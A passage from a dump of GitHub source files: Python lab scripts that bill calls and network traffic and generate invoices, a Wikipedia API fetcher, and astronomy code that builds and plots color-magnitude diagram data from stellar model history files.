in docs:\n# \t\tdoc = preprocessing(doc)\n# \t\tdoc_list.append(doc)\n\n# \tfor term in terms:\n# \t\ttfidf[term][\"docFrequency\"] = 1\n# \t\tfor doc in docs:\n# \t\t\tif term in doc:\n# \t\t\t\ttfidf[term][\"docFrequency\"] += 1\n\n# \treturn\n\n# def calc(tfidf):\n\n# \tterm_list = []\n\n# \tfor term in tfidf:\n# \t\ttf = tfidf[term][\"termFrequency\"]\n# \t\tdoc_len = len(tfidf)\n# \t\tdf = tfidf[term][\"docFrequency\"]\n# \t\tdocs_len = len(docs)\n\n# \t\ttfidf_calc = (tf/doc_len) * log(docs_len/df)\n\n# \t\tterm_list.append([tfidf_calc, term])\n\n# \tresults = sorted(term_list, reverse=True)[:10]\n\n# \tprint(results)" } ]
1
kolyas-lopata/Mdm
https://github.com/kolyas-lopata/Mdm
d4753f1c0dcc8da3347aa039b7e0c4420bce915f
e221da0a861292b3471ba9df4b266a2a63424af7
4ebaabadafa7a295e91033bce4d676bfe8a81cdf
refs/heads/master
2022-09-16T20:49:31.996786
2020-05-31T17:22:48
2020-05-31T17:22:48
263,444,437
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6380255818367004, "alphanum_fraction": 0.6617915630340576, "avg_line_length": 21.79166603088379, "blob_id": "358d431fbd105266831fef3ca6d63b8cec51cb47", "content_id": "2523f0f6979c66c50db47481d8e7ea7c36ed4714", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 564, "license_type": "no_license", "max_line_length": 108, "num_lines": 24, "path": "/lab3/main.py", "repo_name": "kolyas-lopata/Mdm", "src_encoding": "UTF-8", "text": "from docxtpl import DocxTemplate\nimport os\n\n\nf=open('billing.txt', 'r', encoding='utf-8')\na=f.readlines()\nprice=float(a[-1].split()[0])\n\n\nf=open('output.txt', 'r', encoding='utf-8')\na=f.readlines()\nprice+=float(a[-1].split()[0])\n\nnds=round(price*0.13,2)\ntemplates=[]\n\ndoc = DocxTemplate(\"template.docx\")\ncontext = {'service':\"Звонки, Смс, Интернет\", 'number':\"1\",'ed':' ','price_ed':'1','price':price, 'nds':nds}\ndoc.render(context)\ndoc.save(\"final_doc.docx\")\n\n\nos.system('abiword --to=pdf final_doc.docx 2>/dev/null')\nos.system('final_doc.docx')\n" }, { "alpha_fraction": 0.4938775599002838, "alphanum_fraction": 0.5537415146827698, "avg_line_length": 27.440000534057617, "blob_id": "c95a85d7a2d8d6a8e91702c571e418de455b25c5", "content_id": "499a12c46b2a03f383733ff04779ab07f4bff7b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1656, "license_type": "no_license", "max_line_length": 77, "num_lines": 50, "path": "/lab1/main.py", "repo_name": "kolyas-lopata/Mdm", "src_encoding": "UTF-8", "text": "# Протарифицировать абонента с номером 933156729 с коэффициентом k:\r\n# 4руб/минута исходящие звонки и входящие звонки до 0:30,\r\n# 2руб/минута исходящие звонки и входящие звонки после 0:30,\r\n# смс - 1,5руб/шт\r\n\r\n\r\n\r\nimport csv\r\n\r\ndef parsing(number):\r\n with open('data.csv', newline='') as csvfile:\r\n calls_before_00_30=[]\r\n calls_after_00_30=[]\r\n datareader = csv.reader(csvfile, delimiter=',')\r\n for row in datareader:\r\n print(row)\r\n if (row[1]==number or row[2]==number) and int(row[0][-5:-3])<30:\r\n calls_before_00_30.append(row)\r\n if (row[1]==number or row[2]==number) and int(row[0][-5:-3])>=30:\r\n calls_after_00_30.append(row)\r\n print(calls_before_00_30,calls_after_00_30)\r\n return calls_before_00_30,calls_after_00_30\r\n\r\n\r\ndef tariffication(before,after):\r\n calls = [0, 0]\r\n mes = 0.0\r\n for i in before:\r\n calls[0] += float(i[3])\r\n mes += float(i[4])\r\n for i in after:\r\n calls[1] += float(i[3])\r\n mes += float(i[4])\r\n x=calls[0]*4+calls[1]*2\r\n y=mes*1.5\r\n return (x,y)\r\n\r\ndef main():\r\n print('Введите номер абонента')\r\n number=str(input())\r\n s=parsing(number)\r\n s=tariffication(s[0],s[1])\r\n\r\n f=open('billing.txt', 'w', encoding='utf-8')\r\n f.write(str(s[0])+' - Счет за звонки\\n')\r\n f.write(str(s[1])+' - Счет за СМС\\n')\r\n f.write(str(s[0]+s[1])+' - Всего')\r\n f.close()\r\n\r\nmain()" }, { "alpha_fraction": 0.46620047092437744, "alphanum_fraction": 0.5151515007019043, "avg_line_length": 21.298702239990234, "blob_id": "f61476b6cabe7541efc4042eabee7e8ca0338938", "content_id": "5bd4c2f40dfe498a69eede8d22c33b2142109587", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1778, "license_type": "no_license", "max_line_length": 118, "num_lines": 77, "path": "/lab2/main.py", "repo_name": "kolyas-lopata/Mdm", "src_encoding": "UTF-8", "text": "# Вариант 7\n# Протарифицировать абонента с 
IP-адресом 87.245.198.147\n# с коэффициентом k: 2руб/Мб\nimport os\nimport math\nimport matplotlib.pyplot as plt\nimport datetime\n\nos.system(\"nfdump -r nfcapd.202002251200 >> input.txt\")\n\ndef refacor():\n\n f=open('input.txt','r', encoding='utf-8')\n f.readline()\n data=[]\n while True:\n q=f.readline()\n a=q.split(' ')\n s=[]\n for i in a:\n if i=='':\n pass\n else:\n s.append(i)\n data.append(s)\n if q=='':\n break\n data=data[:-5]\n f.close()\n return data\n\n\n\ndef tarification(ip):\n data=refacor()\n coord=[]\n trafik=0\n\n for i in data:\n if i[5][:len(ip)]==ip or i[7][:len(ip)]==ip:\n if i[-2]=='M':\n trafik+=float(i[-3])\n coord.append([float(i[-3])*1024*1024,str(datetime.time(int(i[1][:2]),int(i[1][3:5]),int(i[1][6:8])))])\n else:\n trafik+=(float(i[-2])/1024)/1024\n coord.append([((float(i[-2]))), str(datetime.time(int(i[1][:2]),int(i[1][3:5]),int(i[1][6:8])))])\n\n\n trafik = math.ceil(trafik)\n print(coord)\n return [trafik,coord]\n\n\n\ndef grafik(coord):\n coord=sorted(coord, key=lambda student: student[1])\n x=[]\n y=[]\n for i in coord:\n x.append(i[0])\n y.append(i[1])\n ax = plt.axes()\n ax.set_ylabel(\"Bytes\", fontsize=14)\n ax.set_xlabel(\"Time\", fontsize=14)\n ax.plot(y, x)\n plt.savefig('graph.png')\n plt.show()\n\ndef main():\n f=open('output.txt', 'w',encoding='utf-8')\n a=tarification('87.245.198.147')\n f.writelines(str(a[0])+'Mb\\n')\n f.writelines(str(a[0]*2)+' руб')\n grafik(a[1])\n f.close()\n\nmain()" } ]
3
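A minimal sketch (not part of the repository above) of the time-split tariff rule that lab1/main.py implements, assuming the same CSV row layout [timestamp, caller, callee, minutes, sms] and the 0:30 cutoff; the function name and rate defaults are illustrative:

```python
def bill(rows, number, cutoff_minute=30, early_rate=4.0, late_rate=2.0, sms_rate=1.5):
    # Return (call_charge, sms_charge) for one subscriber.
    calls = sms = 0.0
    for ts, src, dst, minutes, texts in rows:
        if number in (src, dst):
            # the minute field of the timestamp decides which call rate applies
            rate = early_rate if int(ts[-5:-3]) < cutoff_minute else late_rate
            calls += float(minutes) * rate
            sms += float(texts) * sms_rate
    return calls, sms
```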
tmk56575/tmk56575
https://github.com/tmk56575/tmk56575
3bf624871a2f84f962efe663a7ab044a6c2bd231
4b0b3433b05cfd79b33122baf4ecb2058467f0da
852ad571306125e80ba4e90f642c80446ef1cf30
refs/heads/master
2021-01-10T02:38:43.754769
2015-11-25T08:02:12
2015-11-25T08:02:12
46,844,096
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6888889074325562, "alphanum_fraction": 0.6940171122550964, "avg_line_length": 25.590909957885742, "blob_id": "bd1f3a41655d2ae3775b4b00825a067135c6ba4b", "content_id": "2c7c0382154f80d7d38f03c73a1fb1049ddc0bd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "no_license", "max_line_length": 84, "num_lines": 22, "path": "/wikiapi.py", "repo_name": "tmk56575/tmk56575", "src_encoding": "UTF-8", "text": "import sys\nimport urllib.request\nimport urllib.parse\n\nif(len(sys.argv) >= 2 ):\n\ttitle = sys.argv[1]\nelse:\n\ttitle = input(\"title>\")\n\n# dbg, json, none, php, txt, xml, yaml\ndata_format = \"?format=txt\"\ndata_action = \"&action=query\"\ndata_prop = \"&prop=revisions\"\ndata_titles = \"&titles=\"+urllib.parse.quote(title)\ndata_rvprop = \"&rvprop=content\"\n\nbaseurl = \"http://ja.wikipedia.org/w/api.php\"\napiurl = baseurl + data_format + data_action + data_prop + data_titles + data_rvprop\nprint(apiurl)\n\nreply = urllib.request.urlopen(apiurl).read().decode(\"utf-8\")\nopen(\"test.txt\",\"w\").write(reply)\n" } ]
1
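A minimal sketch (not part of the repository above) of the same MediaWiki revisions query that wikiapi.py builds by string concatenation, using urlencode for escaping; switching to format=json and the function name are illustrative choices, not the original's:

```python
import json
import urllib.parse
import urllib.request

def fetch_revision(title):
    # Same endpoint and parameters as wikiapi.py, but with the query
    # string built by urlencode and the reply parsed as JSON.
    params = urllib.parse.urlencode({
        "format": "json",
        "action": "query",
        "prop": "revisions",
        "titles": title,
        "rvprop": "content",
    })
    url = "http://ja.wikipedia.org/w/api.php?" + params
    with urllib.request.urlopen(url) as reply:
        return json.loads(reply.read().decode("utf-8"))
```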
AJChalmers/CMD_FileMaker
https://github.com/AJChalmers/CMD_FileMaker
016f7280272126df7dfc73a37ad52de9e5483666
4cf33bfcb2a61eb2dd2eb7253251c4fda6e62054
129164b73176936af508c425ed3f7afef5dd968b
refs/heads/main
2023-02-06T18:13:40.695456
2020-12-28T18:12:52
2020-12-28T18:12:52
325,079,901
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6542137265205383, "alphanum_fraction": 0.6607298254966736, "avg_line_length": 30.871429443359375, "blob_id": "9df2a3bd8acd6fed3e187be71194680f931a1668", "content_id": "411cdf065902e4af533048703764b84bd0593692", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2302, "license_type": "no_license", "max_line_length": 151, "num_lines": 70, "path": "/CMD_plotterV2.py", "repo_name": "AJChalmers/CMD_FileMaker", "src_encoding": "UTF-8", "text": "## To Run with python: cd to directory, python FileName.py. Takes history_mainset_modelnumber, outputs plotname_mainset_modelnumber\r\n\r\n# V2: Changed inverter from int to boolean, changed the input file name, set marker color to red, fixed indentation issues\r\n# V3: Me, changing program from HR_plotter to a period/GREKM/light curve plotter for non linear data \r\n###NEW PROGRAM\r\n\r\n# V1: Made of off FullAmpChecker to make light curve plots automatically\r\n###NEW PROGRAM\r\n\r\n# V1: Templet for CMD_FileMakerV3.cpp. C program will use and edit this templet to make program that it will run. Also made change for Y-axis invertion\r\n\r\n# V2: Adding Type and data location controls to make use easier (also to make gettting I,V-I easy)\r\n\r\n# import libraries\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n### Controls ###\r\n\r\nMode = 'NinthO'\r\n\r\nCMDdata_FileName = '_CMDdataClassical_Set' #Prefix to input CMD data file. Suffix is Set.dat (example: FU_CMDdata_Set as prefix and A.dat as suffix)\r\n\r\nStarType = 'Classical' #Type of star being analyized. Will use this for title to plot and output file for plot.\r\nxTitle = 'M_V - M_I (Mags)' #Label for xaxis. 'M_V - M_I (Mags)' usually\r\nyTitle = 'M_I (Mags)' #Label for yaxis. 'M_V (Mags)' or 'M_I (Mags)'\r\n\r\nDataLocationFor_x = 3 #Location in file for x value. Note, starts at 0. \r\nDataLocationFor_y = 2 #Location in file for y value. Note, starts at 0. 2 for I, 1 for V\r\n\r\n# create array to iterate through convection sets\r\n\r\nsets = ['C', 'D'] #'A', 'B', 'C', 'D'\r\n\r\n# variable to keep y axis inverted\r\n\r\ninverter = True #Made False for NonLinear analysis\r\n\r\n\r\nfor i in sets:\r\n\t\r\n # grab data from file\r\n\r\n data = np.loadtxt(Mode + CMDdata_FileName + i + '.dat', skiprows=1) \r\n\t\r\n\t### CMD Stuff ###\r\n\t\r\n\t# This seems to go X then Y column, starts at 0\r\n plt.plot(data[:, DataLocationFor_x], data[:, DataLocationFor_y], 'r.', markersize=1) #Plotting\r\n plt.xlabel(xTitle)\r\n plt.ylabel(yTitle)\r\n plt.suptitle(Mode + ' mode Set ' + i + ' CMD ' + StarType)\r\n\r\n # invert x axis once\r\n\r\n if inverter:\r\n\r\n # invert y axis\r\n\r\n plt.gca().invert_yaxis()\r\n #inverter = False\r\n\r\n # show the plot\r\n # plt.show()\r\n\r\n # save file\r\n\r\n plt.savefig(Mode + '_Set' + i + '_' + StarType + 'CMD.png')\r\n plt.clf()\r\n\t" }, { "alpha_fraction": 0.6382978558540344, "alphanum_fraction": 0.6440483331680298, "avg_line_length": 26.491804122924805, "blob_id": "fadb517d2c7cb196d7b58569d71c02e1af0a7849", "content_id": "6e9dd6520abe014f29fb1b6bf749d07cef5f7446", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1739, "license_type": "no_license", "max_line_length": 151, "num_lines": 61, "path": "/CMD_plotter.py", "repo_name": "AJChalmers/CMD_FileMaker", "src_encoding": "UTF-8", "text": "## To Run with python: cd to directory, python FileName.py. 
Takes history_mainset_modelnumber, outputs plotname_mainset_modelnumber\r\n\r\n# V2: Changed inverter from int to boolean, changed the input file name, set marker color to red, fixed indentation issues\r\n# V3: Me, changing program from HR_plotter to a period/GREKM/light curve plotter for non linear data \r\n###NEW PROGRAM\r\n\r\n# V1: Made of off FullAmpChecker to make light curve plots automatically\r\n###NEW PROGRAM\r\n\r\n# V1: Templet for CMD_FileMakerV3.cpp. C program will use and edit this templet to make program that it will run. Also made change for Y-axis invertion\r\n\r\n# import libraries\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n### Controls ###\r\n\r\nMode = 'NinthO'\r\n\r\nCMDdata_FileName = '_CMDdataRRL_Set' #Prefix to input CMD data file. Suffix is Set.dat (example: FU_CMDdata_Set as prefix and A.dat as suffix)\r\n\r\n# create array to iterate through convection sets\r\n\r\nsets = ['B', 'C', 'D'] #'A', 'B', 'C', 'D'\r\n\r\n# variable to keep y axis inverted\r\n\r\ninverter = True #Made False for NonLinear analysis\r\n\r\n\r\nfor i in sets:\r\n\t\r\n # grab data from file\r\n\r\n data = np.loadtxt(Mode + CMDdata_FileName + i + '.dat', skiprows=1) \r\n\t\r\n\t### CMD Stuff ###\r\n\t\r\n\t# This seems to go X then Y column, starts at 0\r\n plt.plot(data[:, 3], data[:, 1], 'r.', markersize=1) #Plotting\r\n plt.xlabel('M_V - M_I (Mags)')\r\n plt.ylabel('M_V (Mags)')\r\n plt.suptitle(Mode + ' mode Set ' + i + ' CMD RRL')\r\n\r\n # invert x axis once\r\n\r\n if inverter:\r\n\r\n # invert y axis\r\n\r\n plt.gca().invert_yaxis()\r\n #inverter = False\r\n\r\n # show the plot\r\n # plt.show()\r\n\r\n # save file\r\n\r\n plt.savefig(Mode + '_Set' + i + '_RRLCMD.png')\r\n plt.clf()\r\n\t" }, { "alpha_fraction": 0.6313516497612, "alphanum_fraction": 0.6761922240257263, "avg_line_length": 33.92409133911133, "blob_id": "d40f11fa042b3dda2d1186c2ce779a29109a67d6", "content_id": "323434d3f3bb6cd48e8e5adc095d47aa7ce7cc6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10883, "license_type": "no_license", "max_line_length": 887, "num_lines": 303, "path": "/CMD_FileMaker.cpp", "repo_name": "AJChalmers/CMD_FileMaker", "src_encoding": "UTF-8", "text": "/////Program designed to use output from InstabilityStrip_V12.cpp along with histroy files to get CMD data. \r\n\r\n//V1: Have program read InstabilityStrip_V12.cpp output for positive growth, then use model numbers in there to get history file. Then fill arrays with history file columns. Output Mv, Mv-Mi for use in python program. \r\n\t//Working program when NumOfSets is set to 1. Only does one set at a time.\r\n\r\n\r\n# include <iostream>\r\n# include <fstream>\r\n# include <math.h>\r\n# include <iomanip>\r\n# include <cmath>\r\n# include <stdlib.h>\r\n# include <cstdlib>\r\n//# include <fstream.h>\r\n# include <string.h>\r\n# include <string>\r\n//# include <dos.h> //For Sleep() \r\n\r\n\r\nusing namespace std;\r\nint main() {\r\n\t\r\n\t//Controls//\r\n\r\n\tint NumOfSets = 1; //Number of sets, usually 4 for A, B, C, D. Max is 4 sets currently\r\n\tint NumOfModels = 20412; //Total possible number of models. Will be used for largest array possible\r\n\t\r\n\tchar log_directory_prefix[50] = \"LINA_reruns/SetA/LOGS/logs_\"; //Prefix to log_directory, suffix is model number. 
This is where history file should be\r\n\tchar HistoryFileName[50] = \"history.data\"; //Normally should be \"history.data\"\r\n\t\r\n\tchar inputFileName_ForPositiveGrowthModels[50] = \"PostiveGrowth\"; //input File with model parameters that have positve growth rates. Will have prefix for mode that is defined below. Must be in working directory. Suffix is \"_Set.dat\"\r\n\t\r\n\tchar outputFileName[50] = \"CMDdata\"; //output file with CMD data in it. Will have prefix for mode defined below as well as the set suffix.\r\n\t\r\n\tchar FU_FilePrefix[10] = \"FU_\"; //Prefix to input/output files that contain data for FU mode\r\n\tchar FO_FilePrefix[10] = \"FO_\"; //Prefix to input/output files that contain data for FO mode\r\n\tchar SO_FilePrefix[10] = \"2O_\"; //Prefix to input/output files that contain data for 2O mode\r\n\tchar ThirdO_FilePrefix[10] = \"ThirdO_\"; //Prefix to input/output files that contain data for ThirdO mode\r\n\tchar ForthO_FilePrefix[10] = \"ForthO_\"; //Prefix to input/output files that contain data for ForthO mode\r\n\tchar FifthO_FilePrefix[10] = \"FifthO_\"; //Prefix to input/output files that contain data for FifthO mode\r\n\tchar SixthO_FilePrefix[10] = \"SixthO_\"; //Prefix to input/output files that contain data for SixthO mode\r\n\tchar SeventhO_FilePrefix[10] = \"SeventhO_\"; //Prefix to input/output files that contain data for SeventhO mode\r\n\tchar EighthO_FilePrefix[10] = \"EighthO_\"; //Prefix to input/output files that contain data for EighthO mode\r\n\tchar NinethO_FilePrefix[10] = \"NinethO_\"; //Prefix to input/output files that contain data for NinethO mode\r\n\t\r\n\tchar SetA_Suffix[10] = \"_SetA.dat\"; //Suffix to input/output file for SetA\r\n\tchar SetB_Suffix[10] = \"_SetB.dat\"; //Suffix to input/output file for SetB\r\n\tchar SetC_Suffix[10] = \"_SetC.dat\"; //Suffix to input/output file for SetC\r\n\tchar SetD_Suffix[10] = \"_SetD.dat\"; //Suffix to input/output file for SetD\r\n\t\r\n\t///////////////////////////////////////\r\n\t\r\n\t//Variables//\r\n\t\r\n\tconst int nArray = NumOfModels + 1;\r\n\t\r\n\tchar FU_FileName[100];\r\n\tchar FO_FileName[100];\r\n\tchar SO_FileName[100];\r\n\tchar ThirdO_FileName[100];\r\n\tchar ForthO_FileName[100];\r\n\tchar FifthO_FileName[100];\r\n\tchar SixthO_FileName[100];\r\n\tchar SeventhO_FileName[100];\r\n\tchar EighthO_FileName[100];\r\n\tchar NinethO_FileName[100];\r\n\t\r\n\tchar FU_HistoryFilePath[100];\r\n\tchar FO_HistoryFilePath[100];\r\n\tchar SO_HistoryFilePath[100];\r\n\tchar ThirdO_HistoryFilePath[100];\r\n\tchar ForthO_HistoryFilePath[100];\r\n\tchar FifthO_HistoryFilePath[100];\r\n\tchar SixthO_HistoryFilePath[100];\r\n\tchar SeventhO_HistoryFilePath[100];\r\n\tchar EighthO_HistoryFilePath[100];\r\n\tchar NinethO_HistoryFilePath[100];\r\n\t\r\n\tchar FU_FullOutputFileName[100];\r\n\tchar FO_FullOutputFileName[100];\r\n\tchar SO_FullOutputFileName[100];\r\n\tchar ThirdO_FullOutputFileName[100];\r\n\tchar ForthO_FullOutputFileName[100];\r\n\tchar FifthO_FullOutputFileName[100];\r\n\tchar SixthO_FullOutputFileName[100];\r\n\tchar SeventhO_FullOutputFileName[100];\r\n\tchar EighthO_FullOutputFileName[100];\r\n\tchar NinethO_FullOutputFileName[100];\r\n\t\r\n\tdouble Model[nArray];\r\n\tdouble z[nArray];\r\n\tdouble x[nArray];\r\n\tdouble M[nArray];\r\n\tdouble L[nArray];\r\n\tdouble T[nArray];\r\n\tdouble Lin_Period[nArray];\r\n\tdouble Growth_rate[nArray];\r\n\tdouble logT[nArray];\r\n\tdouble logP[nArray];\r\n\tdouble logM[nArray];\r\n\t\r\n\tdouble abs_mag_V[nArray];\r\n\tdouble 
abs_mag_I[nArray];\r\n\t\r\n\tint NumOfLines = 0;\r\n\t\r\n\tstring readout;\r\n\tstring input_header;\r\n\tstring Model_string;\r\n\t\r\n\tstring history_header1;\r\n\tstring history_header2;\r\n\tstring history_header3;\r\n\tstring history_header4;\r\n\tstring history_header5;\r\n\tstring history_header6;\r\n\t\r\n\tifstream inFileFU;\r\n\tifstream inFileFO;\r\n\tifstream inFileSO;\r\n\tifstream inFileThirdO;\r\n\tifstream inFileForthO;\r\n\tifstream inFileFifthO;\r\n\tifstream inFileSixthO;\r\n\tifstream inFileSeventhO;\r\n\tifstream inFileEighthO;\r\n\tifstream inFileNinethO;\r\n\t\r\n\tifstream inFileHistoryFU;\r\n\tifstream inFileHistoryFO;\r\n\tifstream inFileHistorySO;\r\n\tifstream inFileHistoryThirdO;\r\n\tifstream inFileHistoryForthO;\r\n\tifstream inFileHistoryFifthO;\r\n\tifstream inFileHistorySixthO;\r\n\tifstream inFileHistorySeventhO;\r\n\tifstream inFileHistoryEighthO;\r\n\tifstream inFileHistoryNinethO;\r\n\t\r\n\tofstream outFileCMD_FU;\r\n\tofstream outFileCMD_FO;\r\n\tofstream outFileCMD_SO;\r\n\tofstream outFileCMD_ThirdO;\r\n\tofstream outFileCMD_ForthO;\r\n\tofstream outFileCMD_FifthO;\r\n\tofstream outFileCMD_SixthO;\r\n\tofstream outFileCMD_SenventhO;\r\n\tofstream outFileCMD_EighthO;\r\n\tofstream outFileCMD_NinethO;\r\n\t\r\n\tdouble dummy1[nArray];\r\n\tdouble dummy2[nArray];\r\n\tdouble dummy3[nArray];\r\n\tdouble dummy4[nArray];\r\n\tdouble dummy5[nArray];\r\n\tdouble dummy6[nArray];\r\n\tdouble dummy7[nArray];\r\n\tdouble dummy8[nArray];\r\n\tdouble dummy9[nArray];\r\n\tdouble dummy10[nArray];\r\n\tdouble dummy11[nArray];\r\n\tdouble dummy12[nArray];\r\n\tdouble dummy13[nArray];\r\n\tdouble dummy14[nArray];\r\n\tdouble dummy15[nArray];\r\n\tdouble dummy16[nArray];\r\n\tdouble dummy17[nArray];\r\n\tdouble dummy18[nArray];\r\n\tdouble dummy19[nArray];\r\n\tdouble dummy20[nArray];\r\n\tdouble dummy21[nArray];\r\n\tdouble dummy22[nArray];\r\n\tdouble dummy23[nArray];\r\n\tdouble dummy24[nArray];\r\n\tdouble dummy25[nArray];\r\n\tdouble dummy26[nArray];\r\n\tdouble dummy27[nArray];\r\n\tdouble dummy28[nArray];\r\n\tdouble dummy29[nArray];\r\n\tdouble dummy30[nArray];\r\n\tdouble dummy31[nArray];\r\n\tdouble dummy32[nArray];\r\n\tdouble dummy33[nArray];\r\n\tdouble dummy34[nArray];\r\n\tdouble dummy35[nArray];\r\n\tdouble dummy36[nArray];\r\n\tdouble dummy37[nArray];\r\n\tdouble dummy38[nArray];\r\n\tdouble dummy39[nArray];\r\n\tdouble dummy40[nArray];\r\n\t\r\n\t\r\n\t//////////////////////////////////////\r\n\t\r\n\t\r\n\t//Main loop for FU mode//\r\n\tfor(int i = 0; i < NumOfSets; i++){\r\n\t\t\r\n\t\t//SetA\r\n\t\tif(i == 0){\r\n\t\t\t\r\n\t\t\t//Put together input file name\r\n\t\t\tstrcpy(FU_FileName, FU_FilePrefix);\r\n\t\t\tstrcat(FU_FileName, inputFileName_ForPositiveGrowthModels);\r\n\t\t\tstrcat(FU_FileName, SetA_Suffix);\r\n\t\t\t\r\n\t\t\tinFileFU.open(FU_FileName, ios::in);\r\n\t\t\t\r\n\t\t\t//Getting number of lines in file\r\n\t\t\twhile(getline(inFileFU, readout)){\r\n\t\t\t\tNumOfLines = NumOfLines + 1;\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\tcout<<\"Number of Lines in FU SetA file: \"<<NumOfLines<<endl;\r\n\t\t\t\r\n\t\t\tinFileFU.close();\r\n\t\t\t\r\n\t\t\tinFileFU.open(FU_FileName, ios::in);\r\n\t\t\tgetline(inFileFU, input_header);\r\n\t\t\t\r\n\t\t\t//Main loop that fills arrays\r\n\t\t\tfor(int j = 1; j < NumOfLines; 
j++){\r\n\t\t\t\t\r\n\t\t\t\tinFileFU>>Model[j]>>z[j]>>x[j]>>M[j]>>L[j]>>T[j]>>Lin_Period[j]>>Growth_rate[j]>>logT[j]>>logP[j]>>logM[j];\r\n\t\t\t\t\r\n\t\t\t\t//cout<<setw(5)<<Model[j]<<setw(20)<<z[j]<<setw(20)<<x[j]<<setw(20)<<M[j]<<setw(20)<<L[j]<<setw(20)<<T[j]<<setw(20)<<Lin_Period[j]<<setw(20)<<Growth_rate[j]<<setw(20)<<logT[j]<<setw(20)<<logP[j]<<setw(20)<<logM[j]<<endl;\r\n\t\t\t\t\r\n\t\t\t\t//Getting model number into string, and then into char\r\n\t\t\t\tstringstream stream;\r\n\t\t\t\t\tstream<<Model[j];\r\n\t\t\t\t\tconst char* Model_char = stream.str().c_str();\t\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t///Get history file and then input into arrays///\r\n\t\t\t\tstrcpy(FU_HistoryFilePath, log_directory_prefix);\r\n\t\t\t\tstrcat(FU_HistoryFilePath, Model_char);\r\n\t\t\t\tstrcat(FU_HistoryFilePath, \"/\");\r\n\t\t\t\tstrcat(FU_HistoryFilePath, HistoryFileName);\r\n\t\t\t\tcout<<\"FU History file path: \"<<FU_HistoryFilePath<<endl;\r\n\t\t\t\t\r\n\t\t\t\tinFileHistoryFU.open(FU_HistoryFilePath, ios::in);\r\n\t\t\t\t//Get headers out of the way\r\n\t\t\t\tgetline(inFileHistoryFU, history_header1);\r\n\t\t\t\tgetline(inFileHistoryFU, history_header2);\r\n\t\t\t\tgetline(inFileHistoryFU, history_header3);\r\n\t\t\t\tgetline(inFileHistoryFU, history_header4);\r\n\t\t\t\tgetline(inFileHistoryFU, history_header5);\r\n\t\t\t\tgetline(inFileHistoryFU, history_header6);\r\n\t\t\t\r\n\t\t\t\tinFileHistoryFU>>dummy1[j]>>dummy2[j]>>dummy3[j]>>dummy4[j]>>dummy5[j]>>dummy6[j]>>dummy7[j]>>dummy8[j]>>dummy9[j]>>dummy10[j]>>dummy11[j]>>dummy12[j]>>dummy13[j]>>dummy14[j]>>dummy15[j]>>dummy16[j]>>dummy17[j]>>dummy18[j]>>dummy19[j]>>dummy20[j]>>dummy21[j]>>dummy22[j]>>dummy23[j]>>dummy24[j]>>dummy25[j]>>dummy26[j]>>dummy27[j]>>dummy28[j]>>dummy29[j]>>dummy30[j]>>dummy31[j]>>dummy32[j]>>dummy33[j]>>dummy34[j]>>dummy35[j]>>dummy36[j]>>dummy37[j]>>abs_mag_V[j]>>abs_mag_I[j]>>dummy40[j]; \r\n\t\t\t\t//cout<<setw(5)<<dummy1[j]<<setw(10)<<dummy2[j]<<setw(10)<<dummy3[j]<<setw(10)<<dummy4[j]<<setw(10)<<dummy5[j]<<setw(10)<<dummy6[j]<<setw(10)<<dummy7[j]<<setw(10)<<dummy8[j]<<setw(10)<<dummy9[j]<<setw(10)<<dummy10[j]<<setw(10)<<dummy11[j]<<setw(10)<<dummy12[j]<<setw(10)<<dummy13[j]<<setw(10)<<dummy14[j]<<setw(10)<<dummy15[j]<<setw(10)<<dummy16[j]<<setw(10)<<dummy17[j]<<setw(10)<<dummy18[j]<<setw(10)<<dummy19[j]<<setw(10)<<dummy20[j]<<setw(10)<<dummy21[j]<<setw(10)<<dummy22[j]<<setw(10)<<dummy23[j]<<setw(10)<<dummy24[j]<<setw(10)<<dummy25[j]<<setw(10)<<dummy26[j]<<setw(10)<<dummy27[j]<<setw(10)<<dummy28[j]<<setw(10)<<dummy29[j]<<setw(10)<<dummy30[j]<<setw(10)<<dummy31[j]<<setw(10)<<dummy32[j]<<setw(10)<<dummy33[j]<<setw(10)<<dummy34[j]<<setw(10)<<dummy35[j]<<setw(10)<<dummy36[j]<<setw(10)<<dummy37[j]<<setw(10)<<abs_mag_V[j]<<setw(10)<<abs_mag_I[j]<<setw(10)<<dummy40[j]; \r\n\r\n\t\t\t\tinFileHistoryFU.close();\r\n\t\t\t\t//cout<<\"abs_mag_V: \"<<abs_mag_V[j]<<endl;\r\n\t\t\t\t//cout<<\"abs_mag_I: \"<<abs_mag_I[j]<<endl;\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t//Make outputfile name \r\n\t\t\tstrcpy(FU_FullOutputFileName, FU_FilePrefix);\r\n\t\t\tstrcat(FU_FullOutputFileName, outputFileName);\r\n\t\t\tstrcat(FU_FullOutputFileName, SetA_Suffix);\r\n\t\t\t\r\n\t\t\toutFileCMD_FU.open(FU_FullOutputFileName, ios::out);\r\n\t\t\toutFileCMD_FU<<setw(5)<<\"Model\"<<setw(34)<<\"abs_mag_V\"<<setw(40)<<\"abs_mag_I\"<<setw(46)<<\"abs_mag_V - abs_mag_I\"<<endl; //Header\r\n\t\t\t\r\n\t\t\tfor(int j = 1; j < NumOfLines; 
